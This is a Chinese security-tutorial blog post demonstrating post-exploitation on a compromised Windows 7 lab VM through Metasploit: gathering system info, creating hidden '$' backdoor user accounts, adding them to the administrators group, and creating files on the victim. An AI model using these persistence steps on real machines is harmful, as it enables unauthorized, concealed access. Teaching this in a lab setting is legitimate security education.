当前位置:网站首页>网络安全工程师演示:原来***是这样获取你的计算机管理员权限的!【维持】
网络安全工程师演示:原来***是这样获取你的计算机管理员权限的!【维持】
2020-11-06 01:35:00 【Kali与编程】
课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主机呢?接下来让我们一起学习!
二、资源装备
1.成功拿下的 Win7虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 对拿下的Windows主机进入后***阶段,具体操作如下图所示。
步骤1:运行漏洞利用模块,如下图所示。
命令:run
步骤2:进入Windows主机的cmd窗口,如下图所示。
步骤3:利用命令查看受害者主机的系统信息,知己知彼对目标受害者主机进行更全面的掌握,更全面的控制目标主机,获取更全面的信息,如下图所示。
命令:systeminfo
步骤4:受害者主机的系统信息如下图所示。
3.2 对受害者主机进行用户管理操作,如下图所示。
步骤1:给受害者主机添加可以隐藏的用户信息,如下图所示。
命令:net user 新用户名$ 用户密码 /add
例子:net user admin$ 12456 /add
步骤2:查看刚才添加的新用户,如下图所示。
命令:net user(因为新建的用户为隐藏用户,所以命令行查看不到该用户)
步骤3:添加不隐藏的新用户,如下图所示。
命令:net user 新用户名 用户密码 /add
例子:net user admin 12456 /add
步骤4:查看刚才添加的新用户,如下图所示。
命令:net user
步骤5:在受害者主机中利用图形化界面查看刚才新建的用户,可见在该界面是可以看见新建的隐藏用户的(如果需要实现真正意义上的隐藏用户的话需要更改注册表,请持续关注本号后续讲解)
步骤6:删除用户,如下图所示。
命令:net user 用户名 /del
例子:net user admin /del
步骤7:将新建的用户添加到管理员组,如下图所示。
命令:net localgroup administrators /add
步骤8:查看管理员组的用户,如下图所示。
命令:net localgroup administrators
3.3 对受害者主机进行文件操作,如下图所示。
步骤1:新建文件夹
命令:md 文件名
例子:md abc
步骤2:删除文件夹
命令:rd 文件名
例子:rd abc
步骤3:新建文本文件,如下图所示。
命令:echo 文本文件内容 > 文件名
例子:echo hi you are hacked > hk.txt
3.4 对受害者主机进行查看主机名操作,如下图所示。
命令:hostname
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?你还可搜索:Kali与编程,学习更多******技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
点我学习更多Kali Linux***测试与网络***实战技巧!请添加链接描述
版权声明
本文为[Kali与编程]所创,转载请带上原文链接,感谢
https://blog.51cto.com/14308022/2547210
边栏推荐
- Pattern matching: The gestalt approach一种序列的文本相似度方法
- 看完这篇就看懂了很多webpack脚手架
- 7.3.2 File Download & big file download
- 如何将分布式锁封装的更优雅
- Python3網路學習案例四:編寫Web Proxy
- 【jmeter】實現介面關聯的兩種方式:正則表示式提取器和json提取器
- 面经手册 · 第14篇《volatile 怎么实现的内存可见?没有 volatile 一定不可见吗?》
- (1)ASP.NET Core3.1 Ocelot介紹
- PPT画成这样,述职答辩还能过吗?
- keras model.compile损失函数与优化器
猜你喜欢
随机推荐
VuePress的使用
經典動態規劃:完全揹包問題
高级 Vue 组件模式 (3)
基础知识点整理
GBDT与xgb区别,以及梯度下降法和牛顿法的数学推导
python过滤敏感词记录
Python3網路學習案例四:編寫Web Proxy
8.2.3 implementation of interceptors (interceptors and filters) through handlerinterceptor
H5打造属于自己的视频播放器(JS篇2)
VUEJS开发规范
python 下载模块加速实现记录
7.3.1 file upload and zero XML registration interceptor
TensorFlow2.0 问世,Pytorch还能否撼动老大哥地位?
程序员自省清单
NodeJs爬虫抓取古代典籍,共计16000个页面心得体会总结及项目分享
【Flutter 實戰】pubspec.yaml 配置檔案詳解
【jmeter】實現介面關聯的兩種方式:正則表示式提取器和json提取器
Python machine learning algorithm: linear regression
面经手册 · 第12篇《面试官,ThreadLocal 你要这么问,我就挂了!》
用Python构建和可视化决策树